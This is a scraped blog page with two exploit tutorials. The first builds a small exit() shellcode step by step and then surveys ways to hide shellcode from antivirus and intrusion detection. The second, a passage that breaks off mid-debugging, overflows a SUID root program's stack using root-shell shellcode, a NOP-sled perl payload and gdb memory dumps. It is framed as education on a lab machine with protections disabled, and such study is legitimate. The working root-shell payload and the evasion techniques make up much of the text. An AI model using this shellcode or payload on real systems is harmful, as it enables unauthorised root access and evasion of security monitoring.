verification.<br /><br /> [bodo@lethalcode testbed7]$ gcc -g exit.c -o exit<br /><br /> [bodo@lethalcode testbed7]$ execstack -s exit<br /><br /> [bodo@lethalcode testbed7]$ ./exit<br /><br /> [bodo@lethalcode testbed7]$ echo $?<br /><br /> 0<br /><br /> [bodo@lethalcode testbed7]$<br /><br />Another verification.<br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main()<br /><br /> {<br /><br /> exit(1);<br /><br /> }<br /><br /> <br /><br /> [bodo@lethalcode testbed7]$ gcc -g exit.c -o exit<br /><br /> [bodo@lethalcode testbed7]$ execstack -s exit<br /><br /> [bodo@lethalcode testbed7]$ ./exit<br /><br /> [bodo@lethalcode testbed7]$ echo $?<br /><br /> 1<br /><br /><br /><br />The first thing we need to know is the Linux system call for exit() and that can be found in unistd.h. System call is the services provided by Linux kernel and just like API’s in Windows, you call them with different arguments. In C programming, it often uses functions defined in libc which provides a wrapper for many system calls. Linux manual page of section 2 provides more information about system calls. To get an overview, try using “man 2” at the command shell. It is also possible to invoke syscall() function directly. Each system call has a function number defined in <syscall.h> or <unistd.h>. Internally, system call is invoked by software interrupt 0x80 to transfer control to the kernel. System call table is defined in Linux kernel source file “arch/i386/kernel/entry.S ”.<br /><br />For our example we need just one system call and that is exit() (terminate the current process and exit with exit code) and its system call number is 1 and the argument is 0, (0 means the program exit normally, non-zero means program exit with an error). They will be stored in eax, ebx registers respectively. With this knowledge, let create the program in assembly.<br /><br /> ######testshell.s#######<br /><br /> #assembly code for exit() system call, AT&T/Linux<br /><br /> <br /><br /> .section .data<br /><br /> .section .text<br /><br /> <br /><br /> .globl _start<br /><br /> <br /><br /> jmp dummy<br /><br /> <br /><br /> _start:<br /><br /> <br /><br /> popl %ebx #gets the "X" address<br /><br /> xor %eax, %eax #clear the eax register<br /><br /> mov %eax, 0x01(%ebx) #move NULL to the end of the "X"<br /><br /> mov $1, %eax #move 1 into %eax<br /><br /> mov $0, %ebx #move 0 into %ebx<br /><br /> int $0x80 #interupt 0x80<br /><br /> dummy:<br /><br /> call _start<br /><br /> .string "X"<br /><br />Then compile and link this assembly program and next, disassemble the executable.<br /><br /><br /><br /> [bodo@lethalcode testbed7]$ as testshell.s -o testshell.o<br /><br /> [bodo@lethalcode testbed7]$ ld testshell.o -o testshell<br /><br /> [bodo@lethalcode testbed7]$ objdump -d testshell<br /><br /> <br /><br /> testshell: file format elf32-i386<br /><br /> <br /><br /> Disassembly of section .text:<br /><br /> <br /><br /> 08048074 <_start-0x2>:<br /><br /> 8048074: eb 12 jmp 8048088 <dummy><br /><br /> <br /><br /> 08048076 <_start>:<br /><br /> 8048076: 5b pop %ebx<br /><br /> 8048077: 31 c0 xor %eax, %eax<br /><br /> 8048079: 89 43 01 mov %eax, 0x1(%ebx)<br /><br /> 804807c: b8 01 00 00 00 mov $0x1, %eax<br /><br /> 8048081: bb 00 00 00 00 mov $0x0, %ebx<br /><br /> 8048086: cd 80 int $0x80<br /><br /> <br /><br /> 08048088 <dummy>:<br /><br /> 8048088: e8 e9 ff ff ff call 8048076 <_start><br /><br /> 804808d: 58 pop %eax<br /><br /> ...<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Extract the shellcode; rearrange the hex in char string format. And each set of hexadecimal value represents our assembly instruction. Using hexadecimal values we can put any ASCII value in the range of 0-255 in one byte.<br /><br /> \xeb\x12\x5b\x31\xc0\x89\x43\x01\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd<br /><br /> \x80\xe8\xe9\xff\xff\xff\x58<br /><br />Eliminating the NULL Bytes<br /><br /><br /><br />Unfortunately in our shellcode, there are NULL bytes and operand. Placing small values into larger registers is the most common error which produced NULL bytes in shellcode programming. In this example we move the 8 bits value $1 (a byte) into the 32-bit %eax register. This will cause our shellcode to produce three NULL bytes. It is better always use the smallest register when inserting or moving a value in shell coding. For NULL bytes, we can easily remove them by taking an 8-bit register instead of 32 bits. So replace the %eax to %al, change the mov to movb.<br /><br /> ######testshell.s#######<br /><br /> #assembly code for exit() system call, AT&T/Linux<br /><br /> <br /><br /> .section .data<br /><br /> .section .text<br /><br /> <br /><br /> .globl _start<br /><br /> <br /><br /> jmp dummy<br /><br /> <br /><br /> _start:<br /><br /> <br /><br /> popl %ebx #gets the "X" address<br /><br /> xor %eax, %eax #clear the eax register<br /><br /> movb %al, 0x01(%ebx) #move NULL to the end of the "X"<br /><br /> movb $1, %al #move 1 into %eax<br /><br /> mov $0, %ebx #move 0 into %ebx<br /><br /> int $0x80 #interupt 0x80<br /><br /> dummy:<br /><br /> call _start<br /><br /> .string "X"<br /><br />Again, compile and disassemble it.<br /><br /> [bodo@lethalcode testbed7]$ as testshell.s -o testshell.o<br /><br /> [bodo@lethalcode testbed7]$ ld testshell.o -o testshell<br /><br /> [bodo@lethalcode testbed7]$ objdump -d testshell<br /><br /> <br /><br /> testshell: file format elf32-i386<br /><br /> <br /><br /> Disassembly of section .text:<br /><br /> <br /><br /> 08048074 <_start-0x2>:<br /><br /> 8048074: eb 0f jmp 8048085 <dummy><br /><br /> <br /><br /> 08048076 <_start>:<br /><br /> 8048076: 5b pop %ebx<br /><br /> 8048077: 31 c0 xor %eax, %eax<br /><br /> 8048079: 88 43 01 mov %al, 0x1(%ebx)<br /><br /> 804807c: b0 01 mov $0x1, %al<br /><br /> 804807e: bb 00 00 00 00 mov $0x0, %ebx<br /><br /> 8048083: cd 80 int $0x80<br /><br /> <br /><br /> 08048085 <dummy>:<br /><br /> 8048085: e8 ec ff ff ff call 8048076 <_start><br /><br /> 804808a: 58 pop %eax<br /><br /> ...<br /><br />Rearrange the shellcode.<br /><br /> \xeb\x0f\x5b\x31\xc0\x88\x43\x01\xb0\x01\xbb\x00\x00\x00\x00\xcd\x80\xe8\xec\xff\xff\xff\x58<br /><br />Well, we still have NULL bytes here. It is caused by the mov operand. When we want the ebx to represent a 0 value instead of NULL we can exclusive ORing the same register as shown below:<br /><br /> xor %ebx, %ebx<br /><br />And the result will be empty %eax instead of NULL. Keep in mind that 0 and NULL values mean differently. Let replace the mov $0x0, %ebx to xor %ebx, %ebx.<br /><br /> ######testshell.s#######<br /><br /> #assembly code for exit() system call, AT&T/Linux<br /><br /> <br /><br /> .section .data<br /><br /> .section .text<br /><br /> <br /><br /> .globl _start<br /><br /> <br /><br /> jmp dummy<br /><br /> <br /><br /> _start:<br /><br /> <br /><br /> popl %ebx #gets the "X" address<br /><br /> xor %eax, %eax #clear the eax register<br /><br /> movb %al, 0x01(%ebx) #move NULL to the end of the "X"<br /><br /> movb $1, %al #move 1 into %eax<br /><br /> xor %ebx, %ebx #move 0 into %ebx<br /><br /> int $0x80 #interupt 0x80<br /><br /> dummy:<br /><br /> call _start<br /><br /> .string "X"<br /><br />Recompile and re-link. Disassemble the program.<br /><br /> [bodo@lethalcode testbed7]$ ld testshell.o -o testshell<br /><br /> [bodo@lethalcode testbed7]$ objdump -d testshell<br /><br /> <br /><br /> testshell: file format elf32-i386<br /><br /> <br /><br /> Disassembly of section .text:<br /><br /> <br /><br /> 08048074 <_start-0x2>:<br /><br /> 8048074: eb 0c jmp 8048082 <dummy><br /><br /> <br /><br /> 08048076 <_start>:<br /><br /> 8048076: 5b pop %ebx<br /><br /> 8048077: 31 c0 xor %eax, %eax<br /><br /> 8048079: 88 43 01 mov %al, 0x1(%ebx)<br /><br /> 804807c: b0 01 mov $0x1, %al<br /><br /> 804807e: 31 db xor %ebx, %ebx<br /><br /> 8048080: cd 80 int $0x80<br /><br /> <br /><br /> 08048082 <dummy>:<br /><br /> 8048082: e8 ef ff ff ff call 8048076 <_start><br /><br /> 8048087: 58 pop %eax<br /><br /> ...<br /><br />Rearrange the shellcode.<br /><br /> \xeb\x0c\x5b\x31\xc0\x88\x43\x01\xb0\x01\x31\xdb\xcd\x80\xe8\xef\xff\xff\xff\x58<br /><br />Now we don’t have NULL byte anymore. So let test our shellcode.<br /><br /> /*test.c*/<br /><br /> #include <unistd.h><br /><br /> <br /><br /> char testshcode[ ]="\xeb\x0c\x5b\x31\xc0\x88\x43\x01\xb0\x01\x31"<br /><br /> "\xdb\xcd\x80\xe8\xef\xff\xff\xff\x58";<br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> /*function pointer*/<br /><br /> int (*funct)();<br /><br /> funct = (int(*)())testshcode;<br /><br /> (int)(*funct)();<br /><br /> return 0;<br /><br /> }<br /><br />Compile and run the program.<br /><br /> [bodo@lethalcode testbed7]$ gcc -g test.c -o test<br /><br /> [bodo@lethalcode testbed7]$ execstack -s test<br /><br /> [bodo@lethalcode testbed7]$ ./test<br /><br /> [bodo@lethalcode testbed7]$ echo $?<br /><br /> 0<br /><br />Well, it works. For exit(1), change the following assembly code:<br /><br /> xor %ebx, %ebx<br /><br />To<br /><br /> movb $1, %bl<br /><br />Recompile and re-link the assembly program. Disassemble it, only three bytes change. The following is the shellcode.<br /><br /> \xeb\x0c\x5b\x31\xc0\x88\x43\x01\xb0\x01\xb3\x01\xcd\x80\xe8\xef\xff\xff\xff\x58<br /><br />Then replace the shellcode in the test.c program. Recompile and rerun the program.<br /><br /> [bodo@lethalcode testbed7]$ gcc -g test.c -o test<br /><br /> [bodo@lethalcode testbed7]$ execstack -s test<br /><br /> [bodo@lethalcode testbed7]$ ./test<br /><br /> [bodo@lethalcode testbed7]$ echo $?<br /><br /> 1<br /><br />Well, we have verified that our shellcode is functioning and you can see that a shellcode is a group of instructions which can be executed while another program is running.<br /><br />Fortunately, there are sites that provide readily available shellcodes for various types of exploits and platforms. There are also programs that can be used to generate shellcodes that suit to our need. So don’t mess up yourself! Check out the links at the end of this Module.<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />More Advanced Techniques<br /><br /><br /><br />In the real situations, network system has many detection and filtering modules or devices such as firewall, anti-virus and IDS. Most of the basic shellcodes construct will fail when going through these systems. But the shellcodes development not static as well. In this section we will try to review some of the advanced techniques used in the development of the shellcodes in order to evade various normalization and signature based security systems that they encounter along the path to the target application and make the codes stealthy. These techniques include:<br /><br /> Utilizing readily available system resources.<br /><br /> Alphanumeric shellcode.<br /><br /> Encrypt the shellcode.<br /><br /> Polymorphic shellcodes.<br /><br /> Metamorphic shellcode.<br /><br /><br />Utilizing System Resources<br /><br /><br /><br />Exploits may fully utilize the resources provided by the target to fully mimic the normal application behavior. For example the exploit may use the targets protocol support and added features to disguise their payloads, including encoding, compression, and encryption. If the target supports any transport compression for example, the payload may be compressed in the stream and decompressed by the server before the vulnerable condition is triggered. The exploit examples include file format vulnerabilities and media-based protocols server vulnerabilities. Many protocol server implementations offer encoding schemes to support data types that require more than the real data. Simple authorization mechanisms that do not use encryption will most likely use simple encoding schemes such as Unicode (UTF) and Base64. If the target offers any form of encryption, the payload may also use that medium instead of the clear text transport medium, and will most likely sneak by the majority of IDS systems such as file format vulnerabilities. The most widely used may be the social engineering techniques that send an encrypted and compressed exploit as an email attachment1which the email itself looks perfectly legitimate.<br /><br /><br />Alphanumeric<br /><br /><br /><br />This method can be used to create exploit code using only printable ASCII characters. In general an alphanumeric code is a series of letters and numbers (hence the name) which are written in a form understandable and processable by a computer. For example, one such alphanumeric code is ASCII. More specifically, in an exploit code terminology alphanumeric code is machine code that is written so that it assembles into entirely readable ASCII-letters such as "a"-"z", "A"-"Z", "1"-"9", "#", "!", "@", and so on. This is possible to do with a very good understanding of the assembly language for the specific computer platform that the code is intended for. This code is used in shellcodes with the intent of fooling applications, such as Web forms, into accepting valid and legal code used for exploit.<br /><br /><br />Encryption<br /><br /><br /><br />In cryptography, encryption is the process of obscuring information to make it unreadable without certain knowledge of how to decrypt. While encryption has been used to protect communications for centuries, only organizations and individuals with an extraordinary need for secrecy have made use of it. In the mid-1970s, strong encryption emerged from the sole preserve of secretive government agencies into the public domain, and is now employed in protecting widely-used systems, such as Internet e-commerce, mobile telephone networks and bank Automatic Teller Machines data communication. Nowadays a common use of the encryption protocols are ssl and ssh. Another consideration is protection against traffic analysis.<br /><br />In exploit world the encryption provided by encoder, in simplest form it tries to eliminate NULLs and other user-defined characters out of shellcode. It most basic algorithm uses a simple XOR and includes a built-in decoder routine. It is usually possible to remove NULL characters in the first place by using the right register size as explained before but it is not always the case when we consider other characters available in standard character sets such as ASCII, EBCDIC and Unicode (and their variant). There may be a need to hide some characters, maybe to avoid signature based recognition or something like that. And finally, encoding the shellcode obscures all clear-text in the shellcode nicely.<br /><br /><br />Polymorphic<br /><br /><br /><br />In computer terminology, polymorphic code is code that mutates while keeping the original algorithm intact. It is self-modifying codes. Historically, polymorphic code was invented in 1992 by the Bulgarian cracker Dark Avenger (a pseudonym) as a means of avoiding pattern recognition from antivirus-software.<br /><br />This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence. Most anti virus-software and intrusion detection systems attempt to locate malicious code by searching through computer files and data packets sent over a computer network. If the security software finds patterns that correspond to known computer viruses, worms or exploit codes, it takes appropriate steps to neutralize the threat. Polymorphic algorithms make it difficult for such software to locate the offending code as it constantly mutates.<br /><br />Encryption is the most commonly used method of achieving polymorphism in code. However, not all of the code can be encrypted as it would be completely unusable. A small portion of it is left unencrypted and used to jumpstart the encrypted software. Anti-virus software targets this small unencrypted portion of code.<br /><br />Malicious programmers have sought to protect their polymorphic code from this strategy by rewriting the unencrypted decryption engine each time the virus or worm is propagated. Sophisticated pattern analysis is used by anti-virus software to find underlying patterns within the different mutations of the decryption engine in hopes of reliably detecting such malware. As an example, ADMutate program was released by Ktwo. ADMutate designed to defeat IDS signature checking by altering the appearance of buffer overflow exploits. This technique actually borrowed from virus writers. The mutation engine contains the following components:<br /><br /> NOP substituted is with operationally inert commands. For example, Intel Architecture has more than 50 NOP equivalent instructions.<br /><br /> Shell code is encoded by XORing with a randomly generated key.<br /><br /> Return address is modulated. Least significant byte altered to jump into different parts of NOPs.<br /><br /><br /><br />And the decode Engine:<br /><br /> Need to decode the XOR’ed shellcode.<br /><br /> Engine is also polymorphic that is by varying the assembly instructions to accomplish the same results in different ways and out of order decoding to vary the signature even more.<br /><br /><br />Metamorphic code<br /><br /><br /><br />This is a more powerful and technically skillful level of polymorphism. In computer virus terms, metamorphic code is a code that can reprogram itself. Often, it does this by translating its own code into a temporary pseudo-code, and then back to normal code again. This is used by some viruses when they are about to infect new files, and the result is that their "children" or "clone" will never look like them selves. The computer viruses that use this technique do this in order to avoid the pattern recognition of the anti virus-software where the actual algorithm does not change but everything else might.<br /><br />Metamorphic code is more effective than polymorphic code. This is because most anti virus-software will try to search for known virus-code even during the execution of the code. Metamorphic code can also mean that a virus is capable of infecting executables from two or more different operating systems (such as Windows and Linux) or even different computer architectures. Often, the virus does this by carrying several viruses with itself, so it is really a matter of several viruses that has been 'combined' together into a "supervirus". Similar to the polymorphic, metamorphic also use encoder and decoder. Worms and virii have used morphing engines for decades to evade signature based Anti Virus systems. This same techniques used in exploit codes that can be used to evade other simple signature-based security systems, such as Intrusion Detection Systems.</b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-88814949936272533432011-09-30T23:30:00.000-07:002011-09-30T23:36:11.485-07:00Buffer over flow tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>THE VULNERABLE AND THE EXPLOIT<br /><br /><br /><br />Warning: All the security setting for buffer overflow protection (non-executable stack and randomization of the certain portion of memory addresses) of the test Linux Fedora machine used in this section has been disabled for the educational purpose of the demonstration. Do not do this on your production machines! OS: Fedora 3, 2.6.11.x kernel with several updates.<br /></b></span><span style="font-size: small;"><b><br /><a href="http://adf.ly/2yvsn">CLICK HERE</a></b></span><br /><span style="font-size: small;"><b><br />With the knowledge that we supposedly have acquired, let test the stack based buffer overflow in the real vulnerable program.<br /><br /><br /><br />SOME BACKGROUND STORY OF THE SUID<br /><br /><br /><br />In certain circumstances, unprivileged users must be able to accomplish tasks that require privileges. An example is the passwd program, which allows normal user to change their password. Changing a user’s password requires modifying the password field in the /usr/bin/passwd file. However, you should not give a user access to change this file directly because the user could change everybody else’s password as well. To get around these problems, Linux/Unix allows programs to be endowed with privilege. Processes executing these programs can assume another UID (User Identifier) or GID (Group Identifier) when they’re running. A program that changes its UID is called a SUID program (set-UID); a program that changes its GID is called a SGID program (set-GID). A program can be both SUID and SGID at the same time. In Windows it may be similar to RunAs. When a SUID program is run, its effective UID becomes that of the owner of the file, rather than of the user who is running it.<br /><br /><br />THE POSSIBLE PROBLEM<br /><br /><br /><br />Any program can be SUID/ SGID, or both SUID and SGID. Because this feature is so general, SUID/SGID can open up some interesting security problems. For example, any user can become the superuser simply by running a SUID copy of csh that is owned by root (you must be root to create a SUID version of the csh). Executable SUID and SGID files or program when run by a normal user may have access to resources not normally available to the user running the program (note the owner vs user of the files). For example:<br /><br /> [bodo@lethalcode /]$ls -l /home/bodo/testbed2/test<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 15 23:11 /home/bodo/testbed2/test<br /><br /> [bodo@lethalcode /]$ls -l /sbin/netreport<br /><br /> -rwxr-sr-x 1 root root 10851 Nov 4 13:48 /sbin/netreport<br /><br /> [bodo@lethalcode /]$<br /><br />The s in the owner’s and group’s permission field in place of the usual x as in the listing above indicates that executable test program is SUID and netreport is SGID. If run by a normal user, the executable will run with the privileges of the owner/group of the file, in this case as root. In this case the program will have access to the same system resources as root (but the limit is defined by what the program can do). These SGID and SUID programs may be used by a cracker as a normal user to gain root privilege. You can try listing all of the SUID and SGID files on your system with the following find command:<br /><br /> [root@lethalcode /]#find / -perm -004000 -o -perm -002000 -type f<br /><br />This find command starts in the root directory (/) and looks for all files that match mode 002000 (SGID) or mode 004000 (SUID). The -type f option causes the search to be restricted to files. For the basic attack you can use the root owned, world writable files and directories. These files and directories can be listed by using the following find command:<br /><br /> [root@lethalcode /]#find / -user root -perm -022<br /><br />You can set/unset SUID or SGID privileges with the chmod command. For example:<br /><br /> chmod 4xxx file_name or chmod +s file_name - SUID<br /><br /> chmod 2xxx file_name - GUID<br /><br />EXAMPLE #1-EXPLOIT DEMONSTRATION<br /><br /><br /><br />In our exploit example we are going to overflow the stack using a SUID program. In this exploit we as normal user are going to spawn a local root shell by overflowing the program owned by root. The vulnerable program used is shown below. This is a SUID program.<br /><br /> /* test.c */<br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> char buff[100];<br /><br /> /*if no argument…*/<br /><br /> if(argc <2)<br /><br /> {<br /><br /> printf("Syntax: %s <input string>\n", argv[0]);<br /><br /> exit (0);<br /><br /> }<br /><br /> strcpy(buff, argv[1]);<br /><br /> return 0;<br /><br /> }<br /><br />The shellcode used to spawn a root shell is as follows:<br /><br /> \x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89<br /><br /> \xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80<br /><br />In our vulnerable program we have declared an array buff[100] of size 100. We use vulnerable functions, strcpy(), that do not do the bound checking of the input. We are going to overflow the stack of this program by supplying more than 100 characters until the return address is properly overwritten and pointing back to the stack which we have stored our ‘root spawning’ shellcode. By simple observation and calculation, the stack frame for this program should be as follows:<br /><br /><br /><br />Spawning a root shell exploit - a stack layout<br /><br />Figure 1: Spawning a root shell exploit - a stack layout.<br /><br /><br /><br />Let run the program with same sample inputs. Firstly, compile the test.c, change the owner and group to root and suid the program then change back to normal user, so that we as normal user can run the program that owned by root.<br /><br /> [bodo@lethalcode testbed2]$ gcc -g test.c -o test<br /><br /> [bodo@lethalcode testbed2]$ ls -l<br /><br /> total 20<br /><br /> -rwxrwxr-x 1 bodo bodo 6312 Feb 25 23:18 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> [bodo@lethalcode testbed2]$ su<br /><br /> Password: *****<br /><br /> [root@lethalcode testbed2]# chown 0:0 test<br /><br /> [root@lethalcode testbed2]# ls -l<br /><br /> total 20<br /><br /> -rwxrwxr-x 1 root root 6312 Feb 25 23:18 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> [root@lethalcode testbed2]# chmod 4755 test<br /><br /> [root@lethalcode testbed2]# ls -l<br /><br /> total 20<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 25 23:18 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> [root@lethalcode testbed2]# exit<br /><br /> exit<br /><br /> [bodo@lethalcode testbed2]$<br /><br />From the previous stack layout, in order to overwrite the return address we need to supply 108 characters or at least 104 to start the overwriting. Let verify this fact by running the program with some sample inputs.<br /><br /> [bodo@lethalcode testbed2]$ ls -l<br /><br /> total 20<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 15 23:11 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> <br /><br /> [bodo@lethalcode testbed2]$ ls -F -l<br /><br /> total 20<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 25 23:18 test*<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c*<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x100'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x104'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x108'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x116'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x120'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x124'`<br /><br /> Segmentation fault<br /><br /> [bodo@lethalcode testbed2]$<br /><br />Well, we need at least 124 bytes instead of 104. So what happened here? Let examine the program using gdb.<br /><br /> [bodo@lethalcode testbed2]$ gdb -q test<br /><br /> Using host libthread_db library "/lib/tls/libthread_db.so.1".<br /><br /> (gdb) disass main<br /><br /> Dump of assembler code for function main:<br /><br /> 0x080483d0 <main+0>: push %ebp<br /><br /> 0x080483d1 <main+1>: mov %esp, %ebp<br /><br /> 0x080483d3 <main+3>: sub $0x78, %esp<br /><br /> 0x080483d6 <main+6>: and $0xfffffff0, %esp<br /><br /> 0x080483d9 <main+9>: mov $0x0, %eax<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0x08048425 <main+85>: add $0x10, %esp<br /><br /> 0x08048428 <main+88>: mov $0x0, %eax<br /><br /> 0x0804842d <main+93>: leave<br /><br /> 0x0804842e <main+94>: ret<br /><br /> ---Type <return> to continue, or q <return> to quit---<br /><br /> End of assembler dump.<br /><br /> (gdb) <br /><br />By disassembling the main(), we can see that 120 (0x78) bytes have been reserved instead of 100. There are some changes here; the stack is aligned by 16 bytes after gcc 2.96. So when main() function is called, the space for a local variable is padded by 16 bytes. Newer version of gcc may also behave differently. It is better for you to use your gdb to verify this. You also can test this by running the following program. Change the n to different values and verify the buffer reserved on the stack by using gdb.<br /><br /> /****testbuf.c******/<br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> char buffer[n];<br /><br /> strcpy(buffer, argv[1]);<br /><br /> return 0;<br /><br /> }<br /><br />Back to our program, the stack now should be like this:<br /><br /><br /><br />Spawning a root shell exploit - stack's content arrangement<br /><br />Figure 2: Spawning a root shell exploit - stack's content arrangement.<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />So, we need at least 124 bytes to start overwriting the saved ebp and 128 bytes to overwrite the return address. Our stack arrangement should be something like the following:<br /><br /> NOPs (72 bytes) + Shellcode (32 bytes) + ‘A’ characters (20 bytes) + Return address (4 bytes-pointing back to the NOPs area) = 72 + 32 + 20 + 4 = 128 bytes<br /><br />Using the perl’s print command for easiness, our input/argument arrangement is as follows. This is a one line command.<br /><br /> `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62<br /><br /> \x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br />In order to make our chances higher in hitting our shellcodes, we pad at the beginning of the stack with NOP (executable no-operation instruction-\x90 for x86). Though guess work might still be required, the return address must not be as precise anymore; it is enough to hit the NOPs area. Now our stack layout should be something like the following:<br /><br /><br /><br />Spawning a root shell exploit - stack's content arrangement with NOPs and shellcodes<br /><br />Figure 3: Spawning a root shell exploit - stack's content arrangement with NOPs and shellcodes.<br /><br /><br /><br />Other Intel x86 instructions that can be used to replace NOPs (because NOPs are easily detected by Intrusion Detection System – IDS) can be found at the following links: NOP equivalent instructions or you can check the processor’s instruction set documentation. Next, let verify the return address of our program by running it in gdb with some sample input/argument as constructed previously. <br /><br /> [bodo@lethalcode testbed2]$ gdb -q test<br /><br /> Using host libthread_db library "/lib/tls/libthread_db.so.1".<br /><br /> (gdb) break main<br /><br /> Breakpoint 1 at 0x80483ec: file test.c, line 7.<br /><br /> (gdb) r `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f<br /><br /> \x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br /> <br /><br /> Starting program: /home/bodo/testbed2/test `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69<br /><br /> \x89\xe3\x52\x53\x89\xe1\x8d\x42x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br /> Breakpoint 1, main (argc=2, argv=0xbffffa54) at test.c:7<br /><br /> 7 if(argc <2)<br /><br /> (gdb) step<br /><br /> 11 strcpy(buff, argv[1]);<br /><br /> (gdb) x/200x $esp<br /><br /> 0xbffff940: 0x6f6e2800 0x0029656e 0xbffff994 0x00000000<br /><br /> 0xbffff950: 0xbffff994 0x00000000 0x00000000 0x00000000<br /><br /> 0xbffff960: 0x00000000 0x00000000 0x00000000 0x00000000<br /><br /> 0xbffff970: 0x00000000 0x00000000 0x0177ff8e 0xbffffa00<br /><br /> 0xbffff980: 0x0066e4f8 0x00000000 0x00000000 0x00000000<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0xbffffa40: 0x08048484 0x006643d0 0xbffffa4c 0x0066af11<br /><br /> 0xbffffa50: 0x00000002 0xbffffb5a 0xbffffb73 0x00000000<br /><br /> 0xbffffa60: 0xbffffbf6 0xbffffc08 0xbffffc18 0xbffffc23<br /><br /> 0xbffffa70: 0xbffffc31 0xbffffc5b 0xbffffc6e 0xbffffc78<br /><br /> 0xbffffa80: 0xbffffe3b 0xbffffe47 0xbffffe52 0xbffffea4<br /><br /> 0xbffffa90: 0xbffffebe 0xbffffeca 0xbffffee2 0xbffffef7<br /><br /> 0xbffffaa0: 0xbfffff08 0xbfffff11 0xbfffff44 0xbfffff54<br /><br /> 0xbffffab0: 0xbfffff5c 0xbfffff69 0xbfffffac 0xbfffffce<br /><br /> 0xbffffac0: 0x00000000 0x00000010 0x0383f3ff 0x00000006<br /><br /> 0xbffffad0: 0x00001000 0x00000011 0x00000064 0x00000003<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0xbffffb30: 0x00000000 0x0000000f 0xbffffb4b 0x00000000<br /><br /> 0xbffffb40: 0x00000000 0x00000000 0x69000000 0x00363836<br /><br /> ---Type <return> to continue, or q <return> to quit---<br /><br /> 0xbffffb50: 0x00000000 0x00000000 0x682f0000 0x2f656d6f<br /><br /> 0xbffffb60: 0x6f646f62 0x7365742f 0x64656274 0x65742f32<br /><br /> 0xbffffb70: 0x90007473 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffbb0: 0x90909090 0x90909090 0x31909090 0xb0c389c0<br /><br /> 0xbffffbc0: 0x3180cd17 0x6e6852d2 0x6868732f 0x69622f2f<br /><br /> 0xbffffbd0: 0x5352e389 0x428de189 0xcd623078 0x61616180<br /><br /> 0xbffffbe0: 0x61616161 0x61616161 0x61616161 0x61616161<br /><br /> 0xbffffbf0: 0xfffba061 0x4f4800bf 0x414e5453 0x623d454d<br /><br /> 0xbffffc00: 0x77616b61 0x00696c61 0x4c454853 0x622f3d4c<br /><br /> 0xbffffc10: 0x622f6e69 0x00687361 0x4d524554 0x6574783d<br /><br /> 0xbffffc20: 0x48006d72 0x53545349 0x3d455a49 0x30303031<br /><br /> 0xbffffc30: 0x48535300 0x494c435f 0x3d544e45 0x66663a3a<br /><br /> 0xbffffc40: 0x313a6666 0x312e3136 0x312e3234 0x312e3435<br /><br /> 0xbffffc50: 0x31203130 0x20383430 0x53003232 0x545f4853<br /><br /> (gdb) x/x $ebp<br /><br /> 0xbffff9c8: 0xbffffa28<br /><br /> (gdb) x/x $ebp+4<br /><br /> 0xbffff9cc: 0x00689e33<br /><br 